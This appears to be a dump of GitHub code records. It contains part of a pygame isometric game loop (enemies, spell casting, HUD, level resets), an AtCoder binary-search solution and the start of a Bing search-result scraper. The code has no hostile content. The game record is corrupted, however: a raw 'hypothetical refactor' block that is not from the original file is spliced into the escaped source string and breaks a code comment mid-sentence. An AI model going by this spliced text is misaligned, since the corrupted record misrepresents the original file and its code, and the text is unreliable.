game_scroll[0] + 15, enemy_loc[1] - game_scroll[1] - 20]) # blit hp_bar on screen\n health_val = pygame.Rect(enemy_loc[0] - game_scroll[0] + 20, enemy_loc[1] - game_scroll[1] - 16, enemy[8] * 25, 8) # display the slime's current HP value\n pygame.draw.rect(screen,(255,0,0),health_val,0) # draw the health value Rect\n\n if enemy[8] <= 0: # enemy[8] represents the HP of the slime. 
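# [hypothetical refactor, not from the original file] Because of the isometric
# projection, each logical direction in the movement branches just below is a
# diagonal on screen; a lookup table captures all four cases:
ISO_VELOCITY = {
    'right': (0.5, 0.5),   # bottom-right on screen
    'left': (-0.5, -0.5),  # top-left
    'up': (0.5, -0.5),     # top-right
    'down': (-0.5, 0.5),   # bottom-left
}

def step(location, direction):
    # location is [x, y]; returns the next position for one frame of movement
    dx, dy = ISO_VELOCITY[direction]
    return [location[0] + dx, location[1] + dy]

assert step([10, 10], 'up') == [10.5, 9.5]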
if it is 0 or less, start making the enemy 'fade out' (decrease its alpha val)\n enemy[9] -= 40 # decrease alpha\n\n screen.blit(enemy_surf,[enemy_loc[0] - game_scroll[0], enemy_loc[1] - game_scroll[1]]) # blit the enemy Surface\n enemy[2] += 1 # increase each enemy's current frame number by 1 each iteration\n\n # handle enemy movement ----------------------------------------#\n # moving enemy on screen // enemy[4] represents the current direction the slime is heading in\n if enemy[4] == 'right': # due to isometric rendering, 'right' is diagonal to the bottom right\n enemy[1][0] += 0.5\n enemy[1][1] += 0.5\n elif enemy[4] == 'left': # isometric rendering, left is diagonal to the top left\n enemy[1][0] -= 0.5\n enemy[1][1] -= 0.5\n elif enemy[4] == 'up': # isometric rendering, up is diagonal to the top right\n enemy[1][0] += 0.5\n enemy[1][1] -= 0.5\n elif enemy[4] == 'down': # isometric rendering, down is diagonal to the bottom left\n enemy[1][0] -= 0.5\n enemy[1][1] += 0.5\n\n # check if enemy left territory\n for territory_tile in enemy[3]: # this will iterate through each territory tile in its territory/area\n if territory_tile.colliderect(enemy[5]): # if at any point the slime is still inside its territory, i.e collides with one of its tiles, break\n break\n else: # if the for loop finishes executing, that means the slime has not collided with any territory tiles\n enemy_left = True # slime has left, set enemy_left to True\n\n # handle direction changing\n if enemy_left: # first check if enemy has left its territory\n direc = enemy[4] # save the location the slime is currently travelling in\n if direc == 'right': # the enemy will change direction depending on the direction it was moving before it exited its territory\n enemy[4] = 'down'\n enemy[1][0] -= 25 # once the slime has left its territory, it needs to be set back inside it\n enemy[1][1] -= 25\n elif direc == 'left':\n enemy[1][0] += 25\n enemy[1][1] += 25\n enemy[4] = 'up'\n elif direc == 'up':\n enemy[1][0] -= 10\n enemy[1][1] += 10\n enemy[4] = 'right'\n elif direc == 'down':\n enemy[1][0] += 10\n enemy[1][1] -= 10\n enemy[4] = 'left'\n enemy_left = False # once the enemy has changed direction and is reset back into its territory, set this back to False\n\n if enemy[2] >= len(animations_dictionary[enemy[0]]) and enemy[6] == 'move': # if the current frame is equal to the last index of its current animation list, reset frame count to 0\n enemy[2] = 0 # reset frame count to 0\n elif enemy[2] >= len(animations_dictionary['slime_dmg']) and enemy[6] == 'hurt': # reset frame number if it is equal to the max index of animation 'hurt'\n enemy[2] = 0\n enemy[6] = 'move' # additionally once the hurt animation is over, change animation back to 'move'\n\n enemy[3] = [] # clear the enemy's territory tiles\n\n if enemy[9] <= 0: # once the enemy is completely invisible (alpha <= 0)\n number_of_enemies -= 1 # subtract one from enemy counter\n enemy[7] = False # don't show hp bar\n\n # handling all tv actions -----------------------------------------------------------------------------------#\n for tv_num,tv in enumerate(active_tvs): # iterate through each tv (each tv is a list containing all its info)\n tv[0].set_alpha(tv[6]) # set the alpha of the tv's Surface being blitted to the alpha value stored in its list\n tv[2] = pygame.Rect(tv[1][0] - game_scroll[0], tv[1][1] - game_scroll[1], broken_tv.get_width(), broken_tv.get_height()) # create and store the tv hitbox in the tv list\n screen.blit(tv[0],(tv[1][0] - game_scroll[0], tv[1][1] - 
game_scroll[1])) # displays the actual TV image/Surface\n\n if tv[2].colliderect(character_feet_hitbox) and tv[5]: # if the tv hitbox collides with the character's feet hitbox, and the tv is not destroyed\n char_alive = False # set character to dead\n\n if frame_count == 59 and tv[5]: # for every 59th frame, if the tv is not destroyed, this will execute\n tv[4] += tv[6] # increase the tv's bullet angle by the current angle stored in tv[6]\n tv[4] = 0 if tv[4] > 360 else tv[4] # reset angle back to 0 if angle is greater than 360, keeps numbers small\n b_loc = [tv[2].x + tv[2].w//2 + game_scroll[0], tv[2].y + tv[2].h//2 + game_scroll[1]] # create the spawn point for the bullets\n tv[3].extend(m.create_bullet(b_loc,tv[4])) # create_bullet returns a list of 4 bullets, each with varying angles. extend the tv's bullet list with these 4\n if len(tv[3]) >= 20: # if the bullet list contains 20 or more bullets, delete the first 4 bullets in the list\n del tv[3][:5]\n\n if len(tv[3]) != 0: # only executes if there are bullets in the tv's bullet list\n for b in tv[3]: # for loop to iterate through each bullet\n b[0][0] += b[1][0] # b[0] contains the bullet's location ([x,y]), b[1] contains bullet's x/y velocity ([x,y]). this line adds x velocity to the x cord\n b[0][1] -= b[1][1] # subtract y velocity from bullet's y cord because of pygame's inverted y-axis\n b_hitbox = pygame.Rect(b[0][0] - bullet.get_width()//2 - game_scroll[0], b[0][1] - bullet.get_height()//2 - game_scroll[1], bullet.get_width(), bullet.get_height()) # create the bullet's hitbox\n screen.blit(bullet,(b[0][0] - bullet.get_width()//2 - game_scroll[0], b[0][1] - bullet.get_height()//2 - game_scroll[1])) # draw the bullet onto the screen\n\n if b_hitbox.colliderect(character_hitbox): # if the bullet hitbox collides with the character, they die\n char_alive = False\n\n if not tv[5]: # start decreasing its alpha if hit by spell\n tv[6] -= 40\n\n if tv[6] <= 0: # once the alpha is 0 or less, always set the alpha to 0 and subtract from num of enemies\n tv[6] = 0\n number_of_enemies -= 1\n\n # making glitch effect for spell casting ----------------------------------------------#\n if spell_cast[0]: # if player clicked mouse one (the 3x3 grid is opening)\n glitch_bg, glitch_bg_sl, glitch_bg_fl, frame_bg = e.create_glitch_effect(gsl,frame=spell_bg.copy())\n\n # display all glitch layers\n screen.blit(glitch_bg,(spell_cast[1][0] - glitch_bg.get_width() // 2, spell_cast[1][1] - glitch_bg.get_height() // 2))\n screen.blit(glitch_bg_sl, (spell_cast[1][0] - glitch_bg_sl.get_width() // 2, spell_cast[1][1] - glitch_bg_sl.get_height() // 2))\n screen.blit(glitch_bg_fl, (spell_cast[1][0] - glitch_bg_fl.get_width() // 2, spell_cast[1][1] - glitch_bg_fl.get_height() // 2))\n screen.blit(frame_bg,(spell_cast[1][0] - frame_bg.get_width() // 2, spell_cast[1][1] - frame_bg.get_height() // 2))\n\n mx, my = pygame.mouse.get_pos() # store current mouse position\n mb = pygame.mouse.get_pressed(3) # mousebutton // will contain a list indicating which mouse buttons from 1-3 have been pressed\n\n # character code -----------------------------------------------------#\n # detect collision\n for rock in rocks: # iterate through each rock in rock list\n if rock is not None: # if a rock exists, this will execute\n rock_hb = rock[1] # store rock hitbox\n if not char_jump: # if the character is not jumping, collision will occur with the character's feet hitbox\n collisions = m.check_collision(character_feet_hitbox,rock_hb) # returns a list holding four booleans, which 
represent the 4 side lengths of the hitbox. one boolean will equal True, indicating the specific side length the player collided with\n else: # if the character is jumping, collisions will occur with the character's shadow hitbox\n collisions = m.check_collision(character_feet_shadow,rock_hb)\n if collisions[0]: # if player collided with upper side of hitbox, repel char back upwards\n char_y -= 5\n elif collisions[1]: # if player collided with bottom, repel char downwards\n char_y += 5\n elif collisions[2]: # if player collided with left, repel char to the left\n char_x -= 5\n elif collisions[3]: # if player collided with right, repel char to the right\n char_x += 5\n\n for tree in trees: # same exact concept as with checking rock collisions\n if tree is not None:\n tree_hb = tree[1]\n if not char_jump:\n collisions = m.check_collision(character_feet_hitbox, tree_hb)\n else:\n collisions = m.check_collision(character_feet_shadow, tree_hb)\n if collisions[0]:\n char_y -= 5\n elif collisions[1]:\n char_y += 5\n elif collisions[2]:\n char_x -= 5\n elif collisions[3]:\n char_x += 5\n\n if not char_jump: # if the character is not jumping, its shadow hitbox will depend on its current 'char_y' val\n character_feet_shadow = pygame.Rect(char_x - game_scroll[0] + 10,char_y - game_scroll[1] + 80,70,20)\n else: # if char jumping, shadow must stay on the ground, location based on 'char_prev_ypos' which holds the y val right before the char jumps\n character_feet_shadow = pygame.Rect(char_x - game_scroll[0] + 10,char_prev_ypos - game_scroll[1] + 80,70,20)\n\n # character movement\n if char_alive: # character can only move if they are alive\n if char_up: # if character moving up, subtract from char_y\n char_y -= char_speed\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'walk',char_animation_lock) # set animation to 'walk' if character is moving\n if char_jump: # if char is jumping and is moving up, move the prev_ypos up as well (so shadow is not stationary mid-jump)\n char_prev_ypos -= char_speed\n if char_down: # same idea, if char is moving down, add to char_y\n char_y += char_speed\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'walk',char_animation_lock) # same idea, change animation to 'walk'\n if char_jump: # if char is jumping but is moving down, add to prev_ypos so shadow moves down the screen\n char_prev_ypos += char_speed\n if char_left:\n char_x -= char_speed\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'walk',char_animation_lock)\n char_animation_flip = False\n if char_right:\n char_x += char_speed\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'walk',char_animation_lock)\n char_animation_flip = True\n if char_jump: # handle character jumping\n char_y -= char_acceleration # subtract from char_y to move char upwards, once char_accel becomes negative the char will move downwards\n char_acceleration -= 1 # decrease char_accel to change the rate at which char_y is changing\n if char_y - game_scroll[1] + 90 > character_feet_shadow.y: # plus 90 to detect bottom edge of character // once char_y hits the top of the char's shadow location, jump is over\n char_jump = False # char has grounded, character is no longer jumping\n char_animation_lock = False # set animation lock to False so character can change animations\n char_current_animation, char_current_frame = 
change_animation(char_current_animation,char_current_frame,'idle',char_animation_lock) # set animation to idle as character has landed, reset char frame number to 0\n\n # check if character fallen\n block_touched = False # bool val which indicates whether or not the char is currently in contact with a block\n if not char_fall: # if the character is not falling off the map\n for num, block_hitbox in enumerate(blocks): # iterate through each block list, which holds each block hitbox\n if character_feet_shadow.colliderect(block_hitbox[0]): # block_hitbox[0] is where the hitbox is located. if the character's shadow is contacting it, this conditional becomes True\n display_shadow = True # display the shadow beneath the char\n block_touched = True\n else: # executes once for loop has exhausted\n if not block_touched: # if a block was not touched, do not display shadow beneath player\n display_shadow = False\n if not block_touched and not char_jump: # if a block was not touched + the character is not currently jumping, they will fall off the map\n char_fall = True\n char_acceleration = 10 # set acceleration for when char is falling\n\n if char_fall: # if character is falling, increase char_y so character moves downwards, increase accel so they move down increasingly fast\n char_y += char_acceleration\n char_acceleration += 1\n\n if char_acceleration >= 30: # once the player reaches a high enough accel (from falling off map) set alive state to False\n char_alive = False\n\n # spell casting code ------------------------------------------------------------------------#\n if mb[0]: # if mouse button one was pressed, this will execute\n spell_cast[0] = True # set spell active state to True\n if spell_cast[1][0] == 0 and spell_cast[1][1] == 0: # if no location exists in spell_cast, this will execute\n spell_cast[1] = [mx, my] # set spell 3x3 grid location to current mouse location (this will be the exact center of the grid)\n else: # if mouse button one is not being pressed, this will execute\n if len(spell_cast[3]) != 0: # check if the user connected any grid points while spell grid was active\n for spell_name, spell_info in spells_dictionary.items(): # iterate through each key + value pair in spells_dict\n spell_points, spell_cost = spell_info # unpack spell_info list into the points connected (spell_points) and the spell cost (spell_cost)\n if char_mana - spell_cost > 0: # check if the character has enough mana to cast the spell\n if spell_points == spell_cast[3]: # compare the points the user connected (spell_cast[3]) to spell_points in the dictionary. 
if there is a match, this will execute\n                        spell_cast[4][0] = spell_name # add to spell_cast the name of the spell which is being cast\n                        char_mana -= spell_cost # subtract the mana cost of the spell\n                        spell_cast[4][2] = spell_cast[1].copy() # give the current location the grid is being drawn at to the list containing the info on drawing the spell\n\n        # every time mb 1 is released, reset all spell-related variables\n        spell_cast[0], spell_cast[2], spell_cast[3] = False, [], []\n        spell_cast[1][0], spell_cast[1][1] = (0, 0)\n        grid_point_diff, grid_points, active_point, gsl = 1, [], 4, 0\n        grid_max = False\n\n    if spell_cast[0]: # if spell grid is active, this will execute\n        for y in range(3): # nested loop to draw each grid_point on the screen (3 rows, 3 columns)\n            for x in range(3):\n                grid_point_loc = [(spell_cast[1][0] - grid_point.get_width() // 2 - grid_point_diff * grid_scale) + x * grid_point_diff * grid_scale,(spell_cast[1][1] - grid_point.get_width() // 2 - grid_point_diff * grid_scale) + y * grid_point_diff * grid_scale] # create location of the grid point\n                if grid_max and len(grid_points) < 9: # make sure grid_points can only contain 9 points at max\n                    grid_points.append(pygame.Rect(grid_point_loc[0], grid_point_loc[1], grid_point.get_width(),grid_point.get_height())) # append Rect object representing where the grid point is to be blitted\n                screen.blit(grid_point, grid_point_loc) # draw the actual grid point image at the created location\n\n        if len(grid_points) != 0: # True if there are grid points currently in the list\n            pygame.draw.line(screen, (0, 0, 0), (grid_points[active_point][0] + grid_point.get_width() // 2,grid_points[active_point][1] + grid_point.get_height() // 2),(mx, my), 10) # draw line from current active point to mouse position\n            for num, rect in enumerate(grid_points): # iterate through each grid point (which is actually a Rect obj) in the list, use enumerate to keep track of the grid point's associated number\n                if rect.collidepoint(mx, my) and num != active_point: # check if the Rect obj collides with the current mouse position, as long as the Rect obj is not the one currently active\n                    spell_cast[2].append([(grid_points[active_point][0] + grid_point.get_width() // 2,grid_points[active_point][1] + grid_point.get_height() // 2),(rect.x + rect.w // 2, rect.y + rect.h // 2)]) # append the center of the grid point which is currently active, and the center of the grid point the mouse collided with\n                    spell_cast[3].append(num) # append the grid point which was contacted to point history\n                    active_point = num # active point now becomes the grid point which was just contacted\n\n        if len(spell_cast[2]) != 0: # drawing the existing line connections\n            for points in spell_cast[2]: # iterate through each list of points in line history, to draw the lines\n                x1, y1 = points[0] # represents location of the active grid point\n                x2, y2 = points[1] # represents location of the point the active grid point connected with\n                pygame.draw.line(screen, (0, 0, 0), (x1, y1), (x2, y2), 10) # draw a line between these two points\n\n        if grid_point_diff < 50: # this is used to scale the difference between grid points, once it is 50 or more, grid has reached its max size\n            grid_point_diff += 5\n        else: # stop increasing grid_point_diff\n            grid_max = True # set grid_max to True to indicate grid has reached max size\n\n        if gsl < 170: # grid side length // used to scale overall size of the grid\n            gsl += 15 # increment by 15 if under 170\n\n    # spell animation handling\n    if spell_cast[4][0] != '': # check if a 
spell is currently stored, if one was cast\n        current_spell_frame = animations_dictionary[spell_cast[4][0]][spell_cast[4][1]] # store the name of the frame to be displayed in the animation\n        csf_surf = animation_frame_surfaces[current_spell_frame] # current spell frame surface // store the actual Surface/image to be displayed given the current frame name\n        if spell_cast[4][0] == 'slash': # if the user cast a 'slash' attack\n            csf_center = (spell_cast[4][2][0] - csf_surf.get_width()//2, spell_cast[4][2][1] - csf_surf.get_height()//2) # create location for the current spell frame to be displayed at, will be the center of the grid\n            csf_hitbox = pygame.Rect(csf_center[0], csf_center[1], csf_surf.get_width(), csf_surf.get_height()) # create the hitbox of the frame being displayed\n        elif spell_cast[4][0] == 'thunder': # if the user cast a 'thunder' attack\n            csf_center = (spell_cast[4][2][0] - csf_surf.get_width()//2, spell_cast[4][2][1] - csf_surf.get_height() + 50) # create center of frame\n            csf_hitbox = pygame.Rect(csf_center[0], csf_center[1] + 350, csf_surf.get_width(), csf_surf.get_height()-400) # create hitbox\n        screen.blit(csf_surf, csf_center) # draw the actual frame of the spell at the center of the grid\n        spell_cast[4][1] += 1 # increase spell's frame count by 1 so new frames in the animation are played\n        if spell_cast[4][1] >= len(animations_dictionary[spell_cast[4][0]]): # once the animation is finished (frame count reached its max), reset the list holding all spell animation info\n            spell_cast[4] = ['', 0, [0, 0]]\n\n    # code for combat detection-----------------------------------------------------------------------#\n\n    for enemy in active_enemies: # iterate through each enemy in enemy list\n        if enemy[5].colliderect(csf_hitbox) and spell_cast[4][1] == 1 and char_alive: # check if enemy collided with spell hitbox, makes sure detection occurs once per spell cast and player is alive\n            enemy[2] = 0 # set enemy current frame to 0 as new animation will play\n            enemy[6] = 'hurt' # set animation to 'hurt' as the enemy is being hit by a spell\n            enemy[7] = True # display the enemy's HP bar\n            if spell_cast[4][0] == 'slash': # if the user cast a slash attack, subtract 1 HP\n                enemy[8] -= 1\n            elif spell_cast[4][0] == 'thunder': # if the user cast a thunder attack, subtract 2 HP\n                enemy[8] -= 2\n\n    for tv in active_tvs: # iterate through each tv in tv list\n        if tv[2].colliderect(csf_hitbox) and spell_cast[4][1] == 1: # if the spell hitbox collides with the tv hitbox, this will execute\n            tv[5] = False # if tv[5] is False, the tv's alpha will start decreasing\n\n    # code for displaying number of enemies ----------------------------------------------------------#\n    # create text for the number of enemies\n    enemy_number_text = enemy_counter_font.render('x ' + str(number_of_enemies), True, (255, 255, 255))\n    enemy_number_text2 = enemy_counter_font.render('x ' + str(number_of_enemies), True, (0, 0, 0))\n    enemy_number_text_rect = enemy_number_text.get_rect()\n    enemy_number_text_rect2 = enemy_number_text2.get_rect()\n    enemy_number_text_rect.center = (830, 180)\n    enemy_number_text_rect2.center = (833, 183)\n\n    # character graphics code ------------------------------------------------------------------------#\n\n    if not char_alive: # check if player is not alive\n        if animations_dictionary['death'] == '': # only executes when no animation is loaded in under the key 'death'\n            if save_screen is None: # store value in save_screen only once\n                save_screen = screen.copy() # save_screen holds a copy of the screen once the player 
dies, used to create a glitchy bg\n animations_dictionary['death'] = e.create_death_screen(10,pygame.transform.flip(char_frame_to_display,char_animation_flip,False)) # func returns a death animation list given the char's current frame\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'death',False) # change animation to 'death' so this death animation plays out, change frame number to 0\n char_animation_lock = True # character can no longer change animation once they die\n\n char_shadow = pygame.transform.scale(char_shadow,(character_feet_shadow.w,character_feet_shadow.h)) # actual image of shadow, scale it to the dimensions of character_feet_shadow Rect\n\n if display_shadow: # if True, the shadow will display\n screen.blit(char_shadow,character_feet_shadow)\n\n char_current_frame += 1 # increase character's current frame by 1\n\n if char_current_frame >= len(animations_dictionary[char_current_animation]) and char_current_animation != 'jump': # if the current frame is equal to the list length, reset it to 0\n char_current_frame = 0\n if char_current_animation == 'death': # if the character is dying, create the glitch screen animation using save_screen which holds a copy of the screen before the char died\n animations_dictionary['screen_glitch'] = e.create_glitch_screen(save_screen,20)\n\n if char_current_animation == 'jump' and char_current_frame >= len(animations_dictionary['jump']): # freeze char frame number at the last index of the jump animation\n char_current_frame = len(animations_dictionary['jump']) - 1\n\n if char_current_animation != 'death': # if animation is not death, display frame depending on char_frame_name\n char_frame_name = animations_dictionary[char_current_animation][char_current_frame] # find frame name depending on char current animation and current frame\n char_frame_to_display = animation_frame_surfaces[char_frame_name] # save the actual Surface to be displayed based on the frame name above\n else:\n char_frame_to_display = animations_dictionary['death'][char_current_frame] # if animation is death, the Surfaces themselves are already located within the dictionary\n\n screen.blit(pygame.transform.flip(char_scythe,char_animation_flip, False), (char_x - game_scroll[0] - 15,char_y - game_scroll[1] - 50)) # display the scythe behind the player\n screen.blit(pygame.transform.flip(char_frame_to_display,char_animation_flip,False),(char_x - game_scroll[0],char_y - game_scroll[1])) # display the character // flip to make the character face the right way\n char_loaded = True\n\n # HUD ----------------------------------------------------------------------------#\n # display pixelated border, mana bar, enemy counter, ZONE header\n screen.blit(game_border,(450 - game_border.get_width()//2,300 - game_border.get_height()//2))\n screen.blit(mana_bar, (8, 115))\n mana_bar_fill_bg, mana_bar_fill_sl, mana_bar_fill_fl = e.create_glitch_effect(int(char_mana*0.8), height=8)\n mana_bar_fill_bg.set_alpha(150)\n screen.blit(mana_bar_fill_bg, (13, 135))\n screen.blit(mana_bar_fill_sl, (13, 135))\n screen.blit(mana_bar_fill_fl, (13, 135))\n screen.blit(enemy_counter_bg, (682, 140))\n screen.blit(enemy_number_text2,enemy_number_text_rect2)\n screen.blit(enemy_number_text,enemy_number_text_rect)\n screen.blit(enemy_counter,(659,120))\n screen.blit(level_header,(450 - level_header.get_width()//2,5))\n if frame_count > 30: # when frame count greater than/less than 30, the colour of the level header changes\n current_level_text = 
level_font.render('ZONE ' + str(current_level),True,(255,255,255))\n current_level_text2 = level_font.render('ZONE ' + str(current_level),True,(212, 212, 212))\n else:\n current_level_text = level_font.render('ZONE ' + str(current_level),True,(174,135,228))\n current_level_text2 = level_font.render('ZONE ' + str(current_level), True, (221, 203, 245))\n current_level_text_rect = current_level_text.get_rect()\n current_level_text_rect2 = current_level_text2.get_rect()\n current_level_text_rect.center = (450,42)\n current_level_text_rect2.center = (451,43)\n screen.blit(current_level_text2, current_level_text_rect2)\n screen.blit(current_level_text,current_level_text_rect)\n\n # scroll system --------------------------------------------------------------------------------------------#\n # add text to scroll depending on level\n scroll_surf = pygame.Surface((900,600)) # create Surface which matches the size of the screen, this is where the scroll text will be drawn onto\n scroll_surf.set_colorkey((0,0,0)) # make the entire surface transparent (black transparent)\n scroll_rect = pygame.Rect(scroll_obj[0][0] + 160,scroll_obj[0][1] + 60, scroll_surf.get_width() - 600, scroll_surf.get_height()) # create Rect obj which text wraps around\n\n if current_level == 1:\n scroll_text = \"This is how I'll be communicating with you. If you want to view/close this scroll, press 'E'. To cast your basic slash attack, hold down the mouse button and drag the following pattern. Good luck! (note: follow the rainbow.)\"\n m.drawText(scroll_surf,scroll_text,(49, 52, 56),scroll_rect,scroll_font,aa=True,bkg=None) # draw scroll text\n scroll_surf.blit(slash_pic,[scroll_obj[0][0] + 230, scroll_obj[0][1] + 330]) # display a picture of the slash pattern for the tutorial\n elif current_level == 2:\n scroll_text = \"Good job on clearing those blobs. Seems as if they had mutated from some sort of chemical concoction left laying around. Keep moving onward!\"\n m.drawText(scroll_surf,scroll_text,(49, 52, 56),scroll_rect,scroll_font,aa=True,bkg=None)\n elif current_level == 3:\n scroll_text = \"You're moving into much more dangerous territory now. I'll show you another spell that will allow you to cast a much more powerful attack - a thunderbolt. Use it at your own discretion, however! It takes a lot of energy. \"\n m.drawText(scroll_surf, scroll_text, (49, 52, 56), scroll_rect, scroll_font, aa=True, bkg=None)\n scroll_surf.blit(thunder_pic,[scroll_obj[0][0] + 230, scroll_obj[0][1] + 330]) # display a picture of the thunder pattern\n elif current_level == 4:\n scroll_text = \"I've picked up some traces of another mutation... it appears to be what humans call 'televisions'. However, they're no ordinary televisions - they shoot bullets! Those bullets are indestructible, so don't even try destroying them. I'd recommend getting rid of those TVs first, because they are extremely annoying.\"\n m.drawText(scroll_surf, scroll_text, (49, 52, 56), scroll_rect, scroll_font, aa=True, bkg=None)\n elif current_level == 5:\n scroll_text = \"This is the ultimate test. I'm sensing a significantly higher amount of enemies in this location... so give it your all! Those spells are all you're gonna get. 
I'll see you on the other side!\"\n        m.drawText(scroll_surf, scroll_text, (49, 52, 56), scroll_rect, scroll_font, aa=True, bkg=None)\n\n    # move scroll on/off the screen\n    if scroll_obj[1] and scroll_obj[0][1] >= 100: # if scroll is active and its y position is greater than 100, move it upwards on screen\n        scroll_obj[0][1] -= 15\n    elif not scroll_obj[1] and scroll_obj[0][1] <= 650: # if scroll is not active and its y pos is less than 650, move it downwards\n        scroll_obj[0][1] += 15\n\n    screen.blit(scroll,scroll_obj[0]) # blit the scroll to location stored\n    screen.blit(scroll_surf,(0,0)) # blit scroll_surf which has all the drawn text on it\n\n    # increase character mana\n    if char_mana <= 255 and frame_count % 5 == 0: # increase only if mana is not maxed, and if frame count is divisible by 5 so mana doesn't replenish too fast\n        char_mana += 1\n\n    if animations_dictionary['screen_glitch'] != '': # if a glitch animation is stored under the 'screen_glitch' key (set once the character dies)\n        screen.blit(save_screen,(0,0))\n        screen.blit(animations_dictionary['screen_glitch'][char_current_frame % 3],(0,0)) # blit the screen glitch frame. % 3 used to return a number from 0-2, as the screen_glitch ani. contains only 3 frames\n        screen.blit(backdrop,(0,0)) # display a backdrop which is fairly transparent to reduce the visibility of the glitch screen\n        screen.blit(game_over_txt, game_over_rect)\n        screen.blit(game_over_txt_2,game_over_rect_2)\n\n    # detect if level has been finished or level is being retried\n    if number_of_enemies == 0 or level_retry:\n        level_transition.set_alpha(level_transition_alpha) # set alpha of level_transition surface\n        screen.blit(level_transition,(0,0)) # level transition is a white Surface which is used for fade transition\n\n        if level_transition_alpha < 400 and not level_fade: # if the alpha is less than 400, increase level transition's alpha value making it more opaque\n            level_transition_alpha += 10\n        else:\n            level_fade = True # once alpha reaches above 400, level has faded out, set level_fade to True\n            if level_timer <= 6:\n                level_transition_alpha -= 50 # decrease alpha of level_transition once a little time has passed, to make the game visible again\n        level_timer += 1\n\n        if not level_retry: # if the level is not being retried, i.e. all enemies have been cleared\n            if level_transition_alpha > 150:\n                active_bg_col,active_bg_col2 = (175, 216, 222), (220, 239, 242) # set bg colours to 'clean' colours\n                active_block,active_tree,active_rock = clean_block,clean_tree,clean_rock # set active assets to clean assets\n\n            if level_timer >= 300: # wait approx 5 seconds (300 frames at 60 FPS) before transitioning to the new level\n                level_transition_alpha += 30 # increase the alpha so that screen grows increasingly white\n                if level_transition_alpha >= 255: # once the screen is completely opaque with white, this will execute\n                    # reset ALL level variables\n                    current_level += 1\n                    if current_level == 6:\n                        game_running = False\n                        break\n                    current_map = load_map(current_level)\n                    game_scroll = [0, 0]\n                    char_x, char_y = (100, 100)\n                    char_alive = True\n                    char_current_animation, char_current_frame, char_animation_lock = 'idle', 0, False\n                    char_acceleration = 0\n                    char_jump, char_fall = False, False\n                    save_screen = None\n                    animations_dictionary['screen_glitch'], animations_dictionary['death'] = '', ''\n                    level_transition_alpha = 0\n                    level_timer = 0\n                    level_fade = False\n                    active_enemies = []\n                    active_tvs = []\n                    found_tvs = False\n                    found_enemies, tile_render_states = False, []\n                    level_retry = False\n                    found_tiles = False\n                    char_mana = 255\n                    level_retry = False\n                    scroll_obj = [[450 - scroll.get_width()//2,700], True]\n                    if current_level % 2 == 0:\n                        active_block, active_tree, active_rock = pink_block, pink_tree, pink_rock\n                        active_bg_col, active_bg_col2 = (166, 27, 38), (102, 18, 25)\n                    else:\n                        active_block, active_tree, active_rock = green_block, green_tree, green_rock\n                        active_bg_col, active_bg_col2 = (45, 53, 61), (82, 96, 110)\n        else: # if level has been retried, not cleared\n            if level_timer >= 1:\n                # reset variables\n                current_map = load_map(current_level)\n                found_tiles = False\n                game_scroll = [0, 0]\n                char_x, char_y = (100, 100)\n                char_alive = True\n                char_current_animation, char_current_frame, char_animation_lock = 'idle', 0, False\n                char_acceleration = 0\n                char_jump, char_fall = False, False\n                save_screen = None\n                animations_dictionary['screen_glitch'], animations_dictionary['death'] = '', ''\n                level_transition_alpha = 0\n                level_timer = 0\n                level_fade = False\n                active_enemies = []\n                active_tvs = []\n                found_tvs = False\n                found_enemies = False\n                found_tiles = False\n                level_retry = False\n                char_mana = 255\n                scroll_obj = [[450 - scroll.get_width()//2,700], True]\n\n    # frame counter code\n    frame_count += 1\n    if frame_count > 60:\n        frame_count = 0\n\n    second_frame_count += 1\n    if second_frame_count > 300:\n        second_frame_count = 0\n\n    pygame.display.flip()\n    clock.tick(FPS)\n\n# ending screen game loop\nwhile True:\n    glitch_bgs = e.create_glitch_effect(900,height=600)\n\n    for glitch_bg in glitch_bgs:\n        screen.blit(glitch_bg,(0,0))\n\n    screen.blit(intro_overlay_surf,(0,0))\n    screen.blit(ending_txt,ending_txt_rect)\n    screen.blit(ending_txt2,ending_txt_rect2)\n\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            pygame.quit()\n\n    clock.tick(60)\n    pygame.display.update()\n","repo_name":"thom974/the-green-reaper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":72490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43038421457","text":"def main():\n    n, k = map(int, input().split())\n    A = list(map(int, input().split()))\n\n    def div_up(a, b):\n        return (a + b - 1) // b\n\n    def check(x):\n        # can every log be cut down to length <= x using at most k cuts?\n        # for a small x, counting unit by unit would take O(sum(A)) time and TLE\n        # k is on the order of 10**9, so tallying cnt one step at a time is no good\n        cnt = 0\n        for a in A:\n            if a > x:\n                # split a into pieces of length x\n                # ceiling division minus 1\n                cnt += div_up(a, x)-1\n        return cnt <= k\n\n    # binary search\n    ok = max(A)\n    ng = 0\n    while ok-ng > 1:\n        mid = (ok+ng)//2\n        if check(mid):\n            ok = mid\n        else:\n            ng = mid\n        # print(mid, check(mid))\n    print(ok)\n\n\nmain()\n","repo_name":"batamorphism/coding","sub_path":"Python/AtCoder/old/abc174_e_1123.py","file_name":"abc174_e_1123.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33068980170","text":"import requests\nfrom bs4 import BeautifulSoup\n\nsearch_content = input(\"Enter search content:\")\nparams = {\"q\": search_content}\nrespond = requests.get(\"https://www.bing.com/search?\", params=params)\nprint(respond.status_code)\n#print(respond.text)\nsoup = BeautifulSoup(respond.text, features=\"html.parser\")\nresult = soup.find(\"ol\",{\"id\":\"b_results\"})\nlinks = result.findAll(\"li\",{\"class\":\"b_algo\"})\n# for item in result:\n#     print(item.find(\"a\").attrs['href'])\n# print(links)\nfor item in links:\n    item_text = item.find(\"a\").text\n    href_text = item.find(\"a\").attrs[\"href\"]\n\n    print(item_text)\n    
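# print the result's URL beneath its title\n    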
